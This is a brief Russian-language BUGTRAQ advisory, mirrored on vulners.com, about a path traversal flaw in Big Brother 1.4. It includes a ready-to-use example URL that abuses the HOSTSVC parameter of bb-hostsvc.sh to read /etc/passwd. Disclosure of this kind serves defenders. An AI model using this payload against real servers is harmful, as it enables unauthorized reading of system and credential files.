Еще дырки в Big Brother

2000-07-1200:00:00

BUGTRAQ

vulners.com

С помощью переменной HOSTSVC можно получить доступ к любому файлу:
http://www.bb4.com/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/passwd

CPENameOperatorVersion
big brothereq1.4

CPE	Name	Operator	Version
	big brother	eq	1.4

References

vulners.com/securityvulns/securityvulns:doc:430